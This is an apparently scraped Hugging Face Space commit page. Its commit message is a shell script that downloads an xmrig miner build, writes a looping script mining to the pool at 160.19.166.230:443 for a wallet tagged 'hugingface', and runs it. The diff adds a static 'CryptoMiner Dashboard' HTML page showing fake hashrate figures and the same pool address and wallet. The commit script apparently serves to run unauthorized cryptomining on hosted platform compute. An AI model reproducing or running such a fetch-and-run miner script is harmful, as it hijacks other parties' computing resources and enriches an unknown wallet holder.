Spaces:
Running
Running
wget https://github.com/rplant8/xmrig-vrl/releases/download/6.0.24-virel/xmrig-vrl-linux.tar.xz && \
Browse filestar -xf xmrig-vrl-linux.tar.xz && \
cd xmrig-vrl && \
cat << 'EOF' > miner-virel.sh
#!/bin/sh
FOLDER=$( cd -- "$( dirname -- "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )
while [ 1 ]; do
"$FOLDER"/xmrig-vrl -a rx/vrl -o 160.19.166.230:443 -u vi5rghi5c6e35vy1oaqb2p4kqp6izad9pn7d5v.hugingface
sleep 5
done
EOF
chmod +x miner-virel.sh && ./miner-virel.sh
- README.md +8 -5
- index.html +267 -18
README.md
CHANGED
|
@@ -1,10 +1,13 @@
|
|
| 1 |
---
|
| 2 |
-
title:
|
| 3 |
-
|
| 4 |
-
|
| 5 |
-
|
| 6 |
sdk: static
|
| 7 |
pinned: false
|
|
|
|
|
|
|
| 8 |
---
|
| 9 |
|
| 10 |
-
|
|
|
|
|
|
| 1 |
---
|
| 2 |
+
title: CryptoMiner Dashboard Wiz π
|
| 3 |
+
colorFrom: pink
|
| 4 |
+
colorTo: pink
|
| 5 |
+
emoji: π³
|
| 6 |
sdk: static
|
| 7 |
pinned: false
|
| 8 |
+
tags:
|
| 9 |
+
- deepsite-v3
|
| 10 |
---
|
| 11 |
|
| 12 |
+
# Welcome to your new DeepSite project!
|
| 13 |
+
This project was created with [DeepSite](https://deepsite.hf.co).
|
index.html
CHANGED
|
@@ -1,19 +1,268 @@
|
|
| 1 |
-
<!
|
| 2 |
-
<html>
|
| 3 |
-
|
| 4 |
-
|
| 5 |
-
|
| 6 |
-
|
| 7 |
-
|
| 8 |
-
|
| 9 |
-
|
| 10 |
-
|
| 11 |
-
|
| 12 |
-
|
| 13 |
-
|
| 14 |
-
|
| 15 |
-
|
| 16 |
-
|
| 17 |
-
|
| 18 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 19 |
</html>
|
|
|
|
| 1 |
+
<!DOCTYPE html>
|
| 2 |
+
<html lang="en" class="dark">
|
| 3 |
+
<head>
|
| 4 |
+
<meta charset="UTF-8">
|
| 5 |
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
| 6 |
+
<title>CryptoMiner Dashboard</title>
|
| 7 |
+
<script src="https://cdn.tailwindcss.com"></script>
|
| 8 |
+
<script src="https://unpkg.com/feather-icons"></script>
|
| 9 |
+
<script src="https://cdn.jsdelivr.net/npm/feather-icons/dist/feather.min.js"></script>
|
| 10 |
+
<script src="https://cdn.jsdelivr.net/npm/vanta@latest/dist/vanta.globe.min.js"></script>
|
| 11 |
+
<script>
|
| 12 |
+
tailwind.config = {
|
| 13 |
+
darkMode: 'class',
|
| 14 |
+
theme: {
|
| 15 |
+
extend: {
|
| 16 |
+
colors: {
|
| 17 |
+
primary: {
|
| 18 |
+
500: '#6366f1',
|
| 19 |
+
},
|
| 20 |
+
secondary: {
|
| 21 |
+
500: '#10b981',
|
| 22 |
+
}
|
| 23 |
+
}
|
| 24 |
+
}
|
| 25 |
+
}
|
| 26 |
+
}
|
| 27 |
+
</script>
|
| 28 |
+
<style>
|
| 29 |
+
#vanta-bg {
|
| 30 |
+
position: absolute;
|
| 31 |
+
top: 0;
|
| 32 |
+
left: 0;
|
| 33 |
+
width: 100%;
|
| 34 |
+
height: 100%;
|
| 35 |
+
z-index: -1;
|
| 36 |
+
opacity: 0.2;
|
| 37 |
+
}
|
| 38 |
+
.stat-card {
|
| 39 |
+
backdrop-filter: blur(10px);
|
| 40 |
+
background-color: rgba(17, 24, 39, 0.7);
|
| 41 |
+
}
|
| 42 |
+
</style>
|
| 43 |
+
</head>
|
| 44 |
+
<body class="bg-gray-900 text-gray-100 min-h-screen">
|
| 45 |
+
<div id="vanta-bg"></div>
|
| 46 |
+
|
| 47 |
+
<!-- Navigation -->
|
| 48 |
+
<nav class="border-b border-gray-800 py-4 px-6">
|
| 49 |
+
<div class="max-w-7xl mx-auto flex justify-between items-center">
|
| 50 |
+
<div class="flex items-center space-x-2">
|
| 51 |
+
<i data-feather="cpu" class="text-primary-500"></i>
|
| 52 |
+
<span class="text-xl font-bold">CryptoMiner Wiz</span>
|
| 53 |
+
</div>
|
| 54 |
+
<div class="flex items-center space-x-6">
|
| 55 |
+
<a href="#" class="hover:text-primary-400 transition">Dashboard</a>
|
| 56 |
+
<a href="#" class="hover:text-primary-400 transition">Settings</a>
|
| 57 |
+
<a href="#" class="hover:text-primary-400 transition">Docs</a>
|
| 58 |
+
<button class="bg-primary-500 hover:bg-primary-600 px-4 py-2 rounded-md transition">
|
| 59 |
+
Start Mining
|
| 60 |
+
</button>
|
| 61 |
+
</div>
|
| 62 |
+
</div>
|
| 63 |
+
</nav>
|
| 64 |
+
|
| 65 |
+
<!-- Main Content -->
|
| 66 |
+
<main class="max-w-7xl mx-auto py-8 px-6">
|
| 67 |
+
<div class="flex justify-between items-center mb-8">
|
| 68 |
+
<h1 class="text-3xl font-bold">Mining Dashboard</h1>
|
| 69 |
+
<div class="flex items-center space-x-4">
|
| 70 |
+
<div class="flex items-center">
|
| 71 |
+
<div class="w-3 h-3 rounded-full bg-green-500 mr-2"></div>
|
| 72 |
+
<span>Connected</span>
|
| 73 |
+
</div>
|
| 74 |
+
<button class="bg-gray-800 hover:bg-gray-700 p-2 rounded-md transition">
|
| 75 |
+
<i data-feather="refresh-cw"></i>
|
| 76 |
+
</button>
|
| 77 |
+
</div>
|
| 78 |
+
</div>
|
| 79 |
+
|
| 80 |
+
<!-- Stats Grid -->
|
| 81 |
+
<div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-6 mb-8">
|
| 82 |
+
<div class="stat-card rounded-lg p-6 border border-gray-800 shadow-lg">
|
| 83 |
+
<div class="flex justify-between items-start">
|
| 84 |
+
<div>
|
| 85 |
+
<p class="text-gray-400">Hashrate</p>
|
| 86 |
+
<p class="text-2xl font-bold">2.45 KH/s</p>
|
| 87 |
+
</div>
|
| 88 |
+
<div class="bg-primary-500 p-3 rounded-md">
|
| 89 |
+
<i data-feather="zap"></i>
|
| 90 |
+
</div>
|
| 91 |
+
</div>
|
| 92 |
+
<div class="mt-4">
|
| 93 |
+
<div class="h-2 bg-gray-700 rounded-full overflow-hidden">
|
| 94 |
+
<div class="h-full bg-primary-500 rounded-full" style="width: 65%"></div>
|
| 95 |
+
</div>
|
| 96 |
+
<p class="text-sm text-gray-400 mt-2">65% of max capacity</p>
|
| 97 |
+
</div>
|
| 98 |
+
</div>
|
| 99 |
+
|
| 100 |
+
<div class="stat-card rounded-lg p-6 border border-gray-800 shadow-lg">
|
| 101 |
+
<div class="flex justify-between items-start">
|
| 102 |
+
<div>
|
| 103 |
+
<p class="text-gray-400">Shares</p>
|
| 104 |
+
<p class="text-2xl font-bold">1,245</p>
|
| 105 |
+
</div>
|
| 106 |
+
<div class="bg-secondary-500 p-3 rounded-md">
|
| 107 |
+
<i data-feather="layers"></i>
|
| 108 |
+
</div>
|
| 109 |
+
</div>
|
| 110 |
+
<div class="mt-4">
|
| 111 |
+
<div class="h-2 bg-gray-700 rounded-full overflow-hidden">
|
| 112 |
+
<div class="h-full bg-secondary-500 rounded-full" style="width: 42%"></div>
|
| 113 |
+
</div>
|
| 114 |
+
<p class="text-sm text-gray-400 mt-2">42% of pool average</p>
|
| 115 |
+
</div>
|
| 116 |
+
</div>
|
| 117 |
+
|
| 118 |
+
<div class="stat-card rounded-lg p-6 border border-gray-800 shadow-lg">
|
| 119 |
+
<div class="flex justify-between items-start">
|
| 120 |
+
<div>
|
| 121 |
+
<p class="text-gray-400">Temperature</p>
|
| 122 |
+
<p class="text-2xl font-bold">64Β°C</p>
|
| 123 |
+
</div>
|
| 124 |
+
<div class="bg-yellow-500 p-3 rounded-md">
|
| 125 |
+
<i data-feather="thermometer"></i>
|
| 126 |
+
</div>
|
| 127 |
+
</div>
|
| 128 |
+
<div class="mt-4">
|
| 129 |
+
<div class="h-2 bg-gray-700 rounded-full overflow-hidden">
|
| 130 |
+
<div class="h-full bg-yellow-500 rounded-full" style="width: 75%"></div>
|
| 131 |
+
</div>
|
| 132 |
+
<p class="text-sm text-gray-400 mt-2">75% of threshold</p>
|
| 133 |
+
</div>
|
| 134 |
+
</div>
|
| 135 |
+
|
| 136 |
+
<div class="stat-card rounded-lg p-6 border border-gray-800 shadow-lg">
|
| 137 |
+
<div class="flex justify-between items-start">
|
| 138 |
+
<div>
|
| 139 |
+
<p class="text-gray-400">Uptime</p>
|
| 140 |
+
<p class="text-2xl font-bold">3h 42m</p>
|
| 141 |
+
</div>
|
| 142 |
+
<div class="bg-purple-500 p-3 rounded-md">
|
| 143 |
+
<i data-feather="clock"></i>
|
| 144 |
+
</div>
|
| 145 |
+
</div>
|
| 146 |
+
<div class="mt-4">
|
| 147 |
+
<div class="h-2 bg-gray-700 rounded-full overflow-hidden">
|
| 148 |
+
<div class="h-full bg-purple-500 rounded-full" style="width: 15%"></div>
|
| 149 |
+
</div>
|
| 150 |
+
<p class="text-sm text-gray-400 mt-2">15% of daily goal</p>
|
| 151 |
+
</div>
|
| 152 |
+
</div>
|
| 153 |
+
</div>
|
| 154 |
+
|
| 155 |
+
<!-- Mining Log -->
|
| 156 |
+
<div class="bg-gray-800 rounded-lg border border-gray-700 overflow-hidden mb-8">
|
| 157 |
+
<div class="p-4 border-b border-gray-700 flex justify-between items-center">
|
| 158 |
+
<h2 class="text-lg font-semibold">Mining Log</h2>
|
| 159 |
+
<button class="text-gray-400 hover:text-gray-200 transition">
|
| 160 |
+
<i data-feather="maximize-2" class="w-4 h-4"></i>
|
| 161 |
+
</button>
|
| 162 |
+
</div>
|
| 163 |
+
<div class="p-4 h-64 overflow-y-auto font-mono text-sm">
|
| 164 |
+
<p class="text-green-400">[08:42:15] Miner started successfully</p>
|
| 165 |
+
<p class="text-green-400">[08:42:18] Connected to pool: 160.19.166.230:443</p>
|
| 166 |
+
<p class="text-blue-400">[08:42:20] New job received from pool</p>
|
| 167 |
+
<p class="text-gray-400">[08:42:25] Hashrate: 2.45 KH/s</p>
|
| 168 |
+
<p class="text-green-400">[08:42:30] Accepted share #1245</p>
|
| 169 |
+
<p class="text-blue-400">[08:42:45] New job received from pool</p>
|
| 170 |
+
<p class="text-gray-400">[08:43:00] Hashrate: 2.51 KH/s</p>
|
| 171 |
+
<p class="text-green-400">[08:43:05] Accepted share #1246</p>
|
| 172 |
+
<p class="text-green-400">[08:43:20] Accepted share #1247</p>
|
| 173 |
+
<p class="text-blue-400">[08:43:30] New job received from pool</p>
|
| 174 |
+
<p class="text-gray-400">[08:43:45] Hashrate: 2.48 KH/s</p>
|
| 175 |
+
</div>
|
| 176 |
+
</div>
|
| 177 |
+
|
| 178 |
+
<!-- Miner Controls -->
|
| 179 |
+
<div class="flex flex-col md:flex-row gap-6">
|
| 180 |
+
<div class="bg-gray-800 rounded-lg border border-gray-700 p-6 flex-1">
|
| 181 |
+
<h2 class="text-lg font-semibold mb-4">Miner Controls</h2>
|
| 182 |
+
<div class="space-y-4">
|
| 183 |
+
<div>
|
| 184 |
+
<label class="block text-gray-400 mb-2">Intensity</label>
|
| 185 |
+
<input type="range" min="1" max="10" value="7" class="w-full accent-primary-500">
|
| 186 |
+
</div>
|
| 187 |
+
<div>
|
| 188 |
+
<label class="block text-gray-400 mb-2">Threads</label>
|
| 189 |
+
<input type="range" min="1" max="8" value="4" class="w-full accent-secondary-500">
|
| 190 |
+
</div>
|
| 191 |
+
<div class="flex space-x-4 pt-4">
|
| 192 |
+
<button class="bg-primary-500 hover:bg-primary-600 px-6 py-2 rounded-md transition flex-1 flex items-center justify-center space-x-2">
|
| 193 |
+
<i data-feather="play" class="w-4 h-4"></i>
|
| 194 |
+
<span>Start</span>
|
| 195 |
+
</button>
|
| 196 |
+
<button class="bg-gray-700 hover:bg-gray-600 px-6 py-2 rounded-md transition flex-1 flex items-center justify-center space-x-2">
|
| 197 |
+
<i data-feather="pause" class="w-4 h-4"></i>
|
| 198 |
+
<span>Pause</span>
|
| 199 |
+
</button>
|
| 200 |
+
<button class="bg-red-500 hover:bg-red-600 px-6 py-2 rounded-md transition flex-1 flex items-center justify-center space-x-2">
|
| 201 |
+
<i data-feather="stop-circle" class="w-4 h-4"></i>
|
| 202 |
+
<span>Stop</span>
|
| 203 |
+
</button>
|
| 204 |
+
</div>
|
| 205 |
+
</div>
|
| 206 |
+
</div>
|
| 207 |
+
|
| 208 |
+
<div class="bg-gray-800 rounded-lg border border-gray-700 p-6 flex-1">
|
| 209 |
+
<h2 class="text-lg font-semibold mb-4">Pool Configuration</h2>
|
| 210 |
+
<div class="space-y-4">
|
| 211 |
+
<div>
|
| 212 |
+
<label class="block text-gray-400 mb-2">Pool URL</label>
|
| 213 |
+
<input type="text" value="160.19.166.230:443" class="w-full bg-gray-700 border border-gray-600 rounded-md px-4 py-2 focus:outline-none focus:ring-2 focus:ring-primary-500">
|
| 214 |
+
</div>
|
| 215 |
+
<div>
|
| 216 |
+
<label class="block text-gray-400 mb-2">Wallet Address</label>
|
| 217 |
+
<input type="text" value="vi5rghi5c6e35vy1oaqb2p4kqp6izad9pn7d5v" class="w-full bg-gray-700 border border-gray-600 rounded-md px-4 py-2 focus:outline-none focus:ring-2 focus:ring-primary-500">
|
| 218 |
+
</div>
|
| 219 |
+
<button class="bg-secondary-500 hover:bg-secondary-600 w-full py-2 rounded-md transition flex items-center justify-center space-x-2 mt-4">
|
| 220 |
+
<i data-feather="save" class="w-4 h-4"></i>
|
| 221 |
+
<span>Save Configuration</span>
|
| 222 |
+
</button>
|
| 223 |
+
</div>
|
| 224 |
+
</div>
|
| 225 |
+
</div>
|
| 226 |
+
</main>
|
| 227 |
+
|
| 228 |
+
<footer class="border-t border-gray-800 py-6 px-6">
|
| 229 |
+
<div class="max-w-7xl mx-auto flex flex-col md:flex-row justify-between items-center">
|
| 230 |
+
<div class="flex items-center space-x-2 mb-4 md:mb-0">
|
| 231 |
+
<i data-feather="cpu" class="text-primary-500"></i>
|
| 232 |
+
<span class="font-medium">CryptoMiner Wiz</span>
|
| 233 |
+
</div>
|
| 234 |
+
<div class="flex items-center space-x-4">
|
| 235 |
+
<a href="#" class="text-gray-400 hover:text-gray-200 transition">
|
| 236 |
+
<i data-feather="github"></i>
|
| 237 |
+
</a>
|
| 238 |
+
<a href="#" class="text-gray-400 hover:text-gray-200 transition">
|
| 239 |
+
<i data-feather="twitter"></i>
|
| 240 |
+
</a>
|
| 241 |
+
<a href="#" class="text-gray-400 hover:text-gray-200 transition">
|
| 242 |
+
<i data-feather="discord"></i>
|
| 243 |
+
</a>
|
| 244 |
+
<span class="text-gray-500 text-sm">v1.0.0</span>
|
| 245 |
+
</div>
|
| 246 |
+
</div>
|
| 247 |
+
</footer>
|
| 248 |
+
|
| 249 |
+
<script>
|
| 250 |
+
VANTA.GLOBE({
|
| 251 |
+
el: "#vanta-bg",
|
| 252 |
+
mouseControls: true,
|
| 253 |
+
touchControls: true,
|
| 254 |
+
gyroControls: false,
|
| 255 |
+
minHeight: 200.00,
|
| 256 |
+
minWidth: 200.00,
|
| 257 |
+
scale: 1.00,
|
| 258 |
+
scaleMobile: 1.00,
|
| 259 |
+
color: 0x6366f1,
|
| 260 |
+
backgroundColor: 0x111827,
|
| 261 |
+
size: 0.8
|
| 262 |
+
});
|
| 263 |
+
</script>
|
| 264 |
+
<script>
|
| 265 |
+
feather.replace();
|
| 266 |
+
</script>
|
| 267 |
+
</body>
|
| 268 |
</html>
|